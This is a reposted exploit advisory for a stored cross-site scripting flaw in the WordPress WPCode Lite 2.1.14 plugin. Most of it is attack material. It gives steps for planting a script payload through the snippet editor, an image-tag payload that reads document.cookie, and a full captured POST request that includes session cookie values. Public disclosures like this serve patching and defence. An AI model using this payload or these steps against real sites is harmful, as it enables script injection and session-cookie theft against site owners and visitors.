WordPress WPCode Lite 2.1.14 Cross Site Scripting
2024-7-3 05:7:20 Author: cxsecurity.com(查看原文) 阅读量:5 收藏

WordPress WPCode Lite 2.1.14 Cross Site Scripting

# Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS # Date: 2024-06-30 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin # Version 2.1.14 ### Steps to Execute the Payload: 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `Code Snippets > `Edit Snippet` via the following URL: ``` https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 ``` 2. **Insert the Payload:** - In the **Code Preview** section, insert the following payload: ``` "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> ``` 3. **Save and Verify:** - Active , Save the changes. - Navigate to the main page of your site: ``` https://127.0.0.1/ ``` - You should see the payload executed. Post Request : POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2 Host: 127.0.0.1 Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 Content-Type: application/x-www-form-urlencoded Content-Length: 673 Origin: https://vagabondcreature.s3-tastewp.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024070003
如有侵权请联系:admin#unsafe.sh